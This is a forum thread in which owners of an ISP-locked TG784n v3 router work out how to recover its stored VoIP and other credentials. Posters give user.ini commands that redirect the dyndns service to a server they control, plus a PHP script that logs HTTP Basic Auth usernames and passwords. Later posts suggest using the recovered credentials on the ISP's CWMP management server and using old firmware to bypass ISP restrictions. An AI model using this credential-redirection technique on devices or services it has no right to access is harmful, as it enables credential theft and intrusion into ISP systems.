VoIP credentials from locked router

Hello everybody,

I've just gotten a Meo-flavor TG784n v3 for my home service. I've seen the
TG784n JTAG post, but I'm afraid I'm too much of a newbie to sotter stuff onto it.

I'm actually interested in using my own router and a smartphone with a voip app so can have one less thing plugged in at the house. (What can I say, I hate clutter.)

Anyway, I've got the networking set up but now I just want to set up VoIP on the smartphone. I can't seem to be able to get the credentials off the darned thing. I saw that some older versions of the firmware let you see the password in the "edit" screen, but it looks like the version I have doesn't.

I tried telnet'ing in and went to the "voice"->"profile" menus, but no luck getting the password.

Anyone have any ideas?

Here's the version info:

Product Name: TG784n v3
Serial Number: CP1335UARHG
Software Release: 10.2.1.D
Software Variant: AM
Boot Loader Version: 1.1.2
Product Code: 3690227C
Board Name: DANT-U

Cheers!

Have you asked your ISP for the logon credentials? My ISP gives them when you phone to the customer service.

Using the webinterface, do you have a "edit" screen where you see dots, stars etc. in the password field? Can you fill in a new password? If so, you will be able to make it readable.
In my case (a Huawei modem) I saw these dots and using the Firfox plugin called "Firebug" the hidden password was revealed.

Ano wrote:

Have you asked your ISP for the logon credentials? My ISP gives them when you phone to the customer service.

I have, and they don't seem willing to give them out.

The interface "edit" screen trick does not work on the version of the FW that is on my modem.

Cheers

Maybe you can downgrade to an earlier version of the firmware in order to see the "edit" screen again?

Can you download and upload the user.ini file?
If yes i will PM you how to get the password.

Me and most of the people here would very much like to know that too pafgoncalves. Because that implies you can somehow decrypt a _DEV3_ hash which is how it is stored on the router and nobody seems to know how to that encryption works exactly. Anyway, does your offer still stand and is it extendable to others besides cafebueno?

Change one of the dyndns entry at [ dyndns.ini ] to point to a server that you control (must be on the WAN side).
Use the _DEV password you want to know in the dyndns configuration.

When the router tries to update the dns entry it will send the password in clear text to your server.

That's a very nice idea!
Do you know if that will work for _CYP2_ passwords too?

Didn't try with those because it seams obvious to me that they are not reversible, but you can try.

The _DEV ones MUST be reversible because they are used to authenticate to external services like dyndns and voip.
With the own passwords that is not needed as the router simply compares the encrypted passwords/hashes.

Well, nice tip anyway. It worked like a charm for _DEV passwords.
I also tried a _CYP but it didn't even respond with that one, they are also different hashes, so it was expected. The _DEV hash for cwmp connectionReqPsswd was decrypted to an MD5 hash.

Thanks.

ner0, how exactly did you do it?
Is it enough to run a server on that address and use a sniffing program? Or do you really need to have certain services running on the server in order to receive the login credentials?
Thanks!

Yes, ano, simply sniffing port 80 with something like Wireshark will be enough. There is no need to have an actual HTTP server or any service for that matter listening on port 80.

1. You need to make 2 changes in the lines of [ dyndns.ini ] section in your user.ini file to point to your server address, the first one is to set your server as the destination, something like this:

Code:

service modify name=custom server=IP_OR_DOMAIN_OF_YOUR_REMOTE_SERVER port=www-http request=/ducupdate.php updateinterval=86400 retryinterval=30 max_retry=3

2. Set your service accordingly and put the password hash you want to decode, for example:

Code:

modify name=dyndns_0 intf=Internet user=whatever@domain.com password=_DEV3_894ED_128-byte-password-truncated-to-prevent-side-scanning_7F796 group=dyndns_0 service=custom status=enabled

3. Restore your router using the user.ini file you just tweaked.
Just as you start the restore process on your router you can start sniffing on your remote server because as soon as your router comes up, it'll try to contact your server with the credentials in plain-text. Using my example you'll get something like this in Wireshark:

Code:

GET /ducupdate.php?username=whatever@domain.com&password=mypwd&blahblah=blahblah

NOTE:
The service name must be the same on step 1. and 2., eg:
- 1. name=custom
- 2. service=custom

Oh, wait... it seems I was wrong.
Coincidentally I was running Apache on port 80 on my remote server when I did this. I just tried it without Apache listening in and it doesn't work. So it seems you really need to have an HTTP server service running. Just install something like XAMPP with minimal services (Apache). Sorry for misleading initially.

Thanks! I will keep it in mind in case I go to another ISP.

It works !
But the password is sent over Basic Authentication not by GET...
I made a simple PHP script that saves the requests on a txt file (passlog.txt)

Code:

<?php
$parms = "User:". $_SERVER['PHP_AUTH_USER']."\nPass:".$_SERVER['PHP_AUTH_PW']."\n\n";
$file = "passlog.txt";
$fh = fopen($file, 'a+') or die("can't open file");
fwrite($fh, $parms."\n");
fclose($fh);
?>

Finally I got the voip working on my computer !


What can we do with this?

Code:

http://acsint.iptv.telecom.pt:17013/cwmpWeb/CPEMgt

Since we have the password?

@MasterGipy:
You forgot to put a tick in 'Disable HTML in this post', and thus the parser removed everything between the first & last `<p' ... `</p'. If you PM me the missing bits I'll add them back (or get some bandwidth & do it yourself) (added back yesterday).

Basic Authentication:
That changed at late r8 firmware. See explanation in the r8.4 'sploit at the bottom of the OP in the password thread.

CWMP:
One thing that you can do with username/password is find the remote-update files & download them (as many as you can get). It is often most useful to have earlier firmware files, as they may have unfixed exploits that will allow the user to bypass ISP restrictions. In addition, the MH Firmware Decryption utilities can allow access to the (firmware-embedded) ISP root/su users as to give yet another method to bypass ISP restrictions.
_________________
Alex Kemp

MasterGipy wrote:

But the password is sent over Basic Authentication not by GET...

GET is a method inherent to the HTTP protocol.
Any HTTP communication is initiated by either the GET method which is a data request or POST method which is submission of data. It doesn't matter what kind of authentication is used. In this case HTTP instead of HTTPS is a plus for us.

MasterGipy wrote:

What can we do with this?

Code:

http://acsint.iptv.telecom.pt:17013/cwmpWeb/CPEMgt

Since we have the password?

Without knowing an exact URI there isn't much we can do I'm afraid.
Also that URL might not be valid anymore. That was probably used to check for updates by the router, the ISP might just push them to the routers now.

If you check your syslog you might find something like this:

Code:

[CWMP] Connected to server, starting transaction.
[CWMP] > Inform (1 BOOT)
[CWMP] > Inform (1 BOOT)
[CWMP] <HTTP> ACS.
[CWMP] Transaction failed, closing connection.